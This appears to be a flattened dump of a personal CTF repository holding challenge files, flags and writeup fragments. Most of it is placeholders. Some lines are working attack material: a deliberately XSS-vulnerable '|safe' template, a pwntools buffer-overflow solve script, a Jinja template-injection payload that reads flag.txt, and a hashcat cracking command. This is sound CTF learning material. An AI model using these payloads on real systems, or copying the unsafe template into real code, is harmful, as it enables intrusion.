6 | {{ comment|safe }} 7 | 8 | 9 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/flask/templates/comment.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | {{ comment|safe }} 5 | 6 | 7 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/info.txt: -------------------------------------------------------------------------------- 1 | flag1: 2 | APACTF{okay,got_it,you_know_how_xss_works...} # Removed from challenges 3 | 4 | flag2: 5 | APACTF{okay,got_it,you_know_how_to_forge_requests...} 6 | 7 | flag3: 8 | APACTF{!f_there_were_no_character_limits_you_m4y_even_get_a_remote_sh3ll_on_my_server!} 9 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/.name: -------------------------------------------------------------------------------- 1 | project -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/scopes/scope_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/admin.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/forms.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/forms.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/0001_initial.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/0001_initial.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/migrations/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/app/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/admin.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/0001_initial.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/0001_initial.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/migrations/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/urls.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/urls.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/comments/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/db.sqlite3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/db.sqlite3 -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | 5 | if __name__ == "__main__": 6 | os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings") 7 | 8 | from django.core.management import execute_from_command_line 9 | 10 | execute_from_command_line(sys.argv) 11 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/settings.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/settings.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/urls.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/urls.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/wsgi.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/project/wsgi.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.py -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/__init__.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/admin.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/models.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/models.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/urls.py: -------------------------------------------------------------------------------- 1 | from django.conf.urls import include, url, patterns 2 | from views import * 3 | 4 | 5 | urlpatterns = patterns('', 6 | url(r'^$', 'shop.views.index', name='shop_index'), 7 | ) 8 | -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/urls.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/urls.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/views.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/IRAN Cert/2016/3- Harder/Web/my awesome shop/project/shop/views.pyc -------------------------------------------------------------------------------- /Challenges/IRAN Cert/README.md: -------------------------------------------------------------------------------- 1 | APA-IUTcert CTF... 2 | -------------------------------------------------------------------------------- /Challenges/README.md: -------------------------------------------------------------------------------- 1 | Challenges I Developed. 2 | -------------------------------------------------------------------------------- /Online-CTF/pwnable.kr-writeups/Toddler's Bottle/bof/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Online-CTF/pwnable.kr-writeups/Toddler's Bottle/bof/bof -------------------------------------------------------------------------------- /Online-CTF/pwnable.kr-writeups/Toddler's Bottle/bof/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | r = process('./bof') 5 | # r = remote('pwnable.kr', 9000) 6 | r.readuntil('overflow me : ') 7 | # 8 | payload = 'A'*44 + p32(0xcafebabe) 9 | # payload = 'fdsfds' 10 | r.sendline(payload) 11 | 12 | r.interactive() 13 | 14 | -------------------------------------------------------------------------------- /Online-CTF/ringzer0team.com/coding/10-read_me_if_you_can/README.md: -------------------------------------------------------------------------------- 1 | #Description 2 | 3 | You have 2 seconds to parse the word. 4 | 5 | Send the answer back using https://ringzer0team.com/challenges/17/[your_string] 6 | -------------------------------------------------------------------------------- /Online-CTF/ringzer0team.com/coding/10-read_me_if_you_can/captcha.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Online-CTF/ringzer0team.com/coding/10-read_me_if_you_can/captcha.png -------------------------------------------------------------------------------- /Online-CTF/ringzer0team.com/coding/11-hash_breaker_reloaded_again/README.md: -------------------------------------------------------------------------------- 1 | #Description 2 | 3 | You have 3 seconds to break this hash 4 | 5 | Send the answer back using https://ringzer0team.com/challenges/159/[clear_text] 6 | 7 | ``` 8 | ----- BEGIN HASH ----- 9 | a9f9225df475266767afc0375ff09378ccc09e5c 10 | ----- END HASH ----- 11 | ``` -------------------------------------------------------------------------------- /Online-CTF/ringzer0team.com/coding/4-i_hate_mathematics/README.md: -------------------------------------------------------------------------------- 1 | #Description 2 | 3 | You have 2 seconds to send the answer 4 | 5 | Send the answer back using https://ringzer0team.com/challenges/32/[answer] 6 | 7 | ``` 8 | ----- BEGIN MESSAGE ----- 9 | 3532 + 0x1a08 - 10010110011111 = ? 10 | ----- END MESSAGE ----- 11 | ``` -------------------------------------------------------------------------------- /Online-CTF/ringzer0team.com/coding/6-hash_breaker/README.md: -------------------------------------------------------------------------------- 1 | #Description 2 | 3 | You have 3 seconds to break this hash 4 | 5 | Send the answer back using https://ringzer0team.com/challenges/56/[clear_text] 6 | 7 | ``` 8 | ----- BEGIN HASH ----- 9 | b3757e73b4bfb806a01e23d01fc2149b99a21b9e 10 | ----- END HASH ----- 11 | ``` -------------------------------------------------------------------------------- /Wiki/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ### Learning Websites 4 | 5 | https://0xdf.gitlab.io/ 6 | -------------------------------------------------------------------------------- /Writeups/2015/hack.dat.kiwi/README.md: -------------------------------------------------------------------------------- 1 | Solutions -------------------------------------------------------------------------------- /Writeups/2015/seccon/SecconWars/images/steg-1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2015/seccon/SecconWars/images/steg-1.jpg -------------------------------------------------------------------------------- /Writeups/2015/seccon/SecconWars/images/steg-2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2015/seccon/SecconWars/images/steg-2.jpg -------------------------------------------------------------------------------- /Writeups/2016/Plaid/rabbit/util.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/Plaid/rabbit/util.pyc -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Cryp1/Ciphertext: -------------------------------------------------------------------------------- 1 | AaY--rpyfneJBeaaX0n-,ZZcs-uXeeSVJ-sh2tioaZ}slrg,-ciE-anfGt.-eCIyss-TzprttFliora{GcouhQIadctm0ltt-FYluuezTyorZ- 2 | -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Web3-oldpersian/images/captcha_main.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/captcha_main.jpg -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Web3-oldpersian/images/main_page.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/main_page.jpg -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_1.jpg -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_2.jpg -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_3.jpg -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/sample_4.jpg -------------------------------------------------------------------------------- /Writeups/2016/SharifCTF/Web3-oldpersian/images/trans.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/SharifCTF/Web3-oldpersian/images/trans.png -------------------------------------------------------------------------------- /Writeups/2016/abctf/cryptography/yummy/baconian.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/abctf/cryptography/yummy/baconian.bmp -------------------------------------------------------------------------------- /Writeups/2016/abctf/programming/qset/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/abctf/programming/qset/__init__.py -------------------------------------------------------------------------------- /Writeups/2016/abctf/programming/qset/interpreter.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/abctf/programming/qset/interpreter.pyc -------------------------------------------------------------------------------- /Writeups/2016/sCTF/Algorithmic/Tracking/info: -------------------------------------------------------------------------------- 1 | Global Positioning Systems (GPS) use satellites to trilaterate a device's position on Planet Earth. You will need to use a very similar method to solve this problem. Download the description and input file to get started! -------------------------------------------------------------------------------- /Writeups/2016/sCTF/cryptography/Verticode/code1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/sCTF/cryptography/Verticode/code1.png -------------------------------------------------------------------------------- /Writeups/2016/sCTF/cryptography/Verticode/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/sCTF/cryptography/Verticode/image.png -------------------------------------------------------------------------------- /Writeups/2016/sCTF/cryptography/Vertinet/description: -------------------------------------------------------------------------------- 1 | This problem follows the same specifications as the previous Verticode problem, except that you have to solve many of them by developing a client to communicate with the server available at problems1.2016q1.sctf.io:50000. Good luck. -------------------------------------------------------------------------------- /Writeups/2016/sCTF/cryptography/Vertinet/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/sCTF/cryptography/Vertinet/image.png -------------------------------------------------------------------------------- /Writeups/2016/tuctf/crypt/magic-image/encrypted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/crypt/magic-image/encrypted.png -------------------------------------------------------------------------------- /Writeups/2016/tuctf/crypt/magic-image/output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/crypt/magic-image/output.png -------------------------------------------------------------------------------- /Writeups/2016/tuctf/misc/the nack/file.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/misc/the nack/file.pcapng -------------------------------------------------------------------------------- /Writeups/2016/tuctf/misc/the nack/output.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2016/tuctf/misc/the nack/output.gif -------------------------------------------------------------------------------- /Writeups/2018/BSides Delhi CTF/Crypt100-TileMate/ci.pher.text: -------------------------------------------------------------------------------- 1 | 9efd0a15d40981b2748897817a1588d57f0812888d7f0859eb7fa23124a17f8b6f24a06e134cacd2 -------------------------------------------------------------------------------- /Writeups/2021/CSAW/crack me/README.md: -------------------------------------------------------------------------------- 1 | hashcat -m 1420 -a 0 hash.txt Downloads/rockyou.txt 2 | 3 | hash.txt: 4 | a60458d2180258d47d7f7bef5236b33e86711ac926518ca4545ebf24cdc0b76c:sha256 5 | 6 | -------------------------------------------------------------------------------- /Writeups/2021/CSAW/exploit1/password_checker: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/CSAW/exploit1/password_checker -------------------------------------------------------------------------------- /Writeups/2021/CSAW/web1/solve.txt: -------------------------------------------------------------------------------- 1 | http://web.chal.csaw.io:5000/submit?value={{%22%22|attr(%22\x5f\x5fclass\x5f\x5f%22)|attr(%22mro%22)()|attr(%22\x5f\x5fgetitem\x5f\x5f%22)(2)|attr(%22\x5f\x5fsubclasses\x5f\x5f%22)()|attr(%22\x5f\x5fgetitem\x5f\x5f%22)(40)(%22flag.txt%22)|attr(%22read%22)()}}&class=class&usc=base&und=_ 2 | 3 | -------------------------------------------------------------------------------- /Writeups/2021/TMUCTF/Pwn/Security Code/flag.txt: -------------------------------------------------------------------------------- 1 | flag 2 | -------------------------------------------------------------------------------- /Writeups/2021/TMUCTF/Pwn/Security Code/images/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/images/1.jpg -------------------------------------------------------------------------------- /Writeups/2021/TMUCTF/Pwn/Security Code/images/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/images/2.jpg -------------------------------------------------------------------------------- /Writeups/2021/TMUCTF/Pwn/Security Code/images/3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/images/3.jpg -------------------------------------------------------------------------------- /Writeups/2021/TMUCTF/Pwn/Security Code/securitycode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/TMUCTF/Pwn/Security Code/securitycode -------------------------------------------------------------------------------- /Writeups/2021/hxp/misc/Log 4 sanity check/Vuln.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/Vuln.class -------------------------------------------------------------------------------- /Writeups/2021/hxp/misc/Log 4 sanity check/docker-stuff/readflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/docker-stuff/readflag -------------------------------------------------------------------------------- /Writeups/2021/hxp/misc/Log 4 sanity check/log4j-api-2.14.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/log4j-api-2.14.1.jar -------------------------------------------------------------------------------- /Writeups/2021/hxp/misc/Log 4 sanity check/log4j-core-2.14.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/log4j-core-2.14.1.jar -------------------------------------------------------------------------------- /Writeups/2021/hxp/misc/Log 4 sanity check/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -euo pipefail 3 | exec java -cp ".:log4j-api-2.14.1.jar:log4j-core-2.14.1.jar" Vuln 4 | -------------------------------------------------------------------------------- /Writeups/2021/hxp/misc/Log 4 sanity check/ynetd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/hxp/misc/Log 4 sanity check/ynetd -------------------------------------------------------------------------------- /Writeups/2021/seccon/average/average: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/seccon/average/average -------------------------------------------------------------------------------- /Writeups/2021/seccon/average/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2021/seccon/average/libc.so.6 -------------------------------------------------------------------------------- /Writeups/2024/ASIS Quals/Detic/requirements.txt: -------------------------------------------------------------------------------- 1 | scipy==1.14.1 2 | -------------------------------------------------------------------------------- /Writeups/2024/ASIS Quals/README.md: -------------------------------------------------------------------------------- 1 | ## ASIS 2024 CTF Writeups 2 | 3 | - Detic (Misc Challenge) 4 | - Snoopy (Misc Challenge) 5 | -------------------------------------------------------------------------------- /Writeups/2024/ASIS Quals/Snoopy/images/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image1.png -------------------------------------------------------------------------------- /Writeups/2024/ASIS Quals/Snoopy/images/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image2.png -------------------------------------------------------------------------------- /Writeups/2024/ASIS Quals/Snoopy/images/image3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Writeups/2024/ASIS Quals/Snoopy/images/image3.png -------------------------------------------------------------------------------- /Writeups/2024/ASIS Quals/Snoopy/images/image4.png: -------------------------------------------------------------------------------- 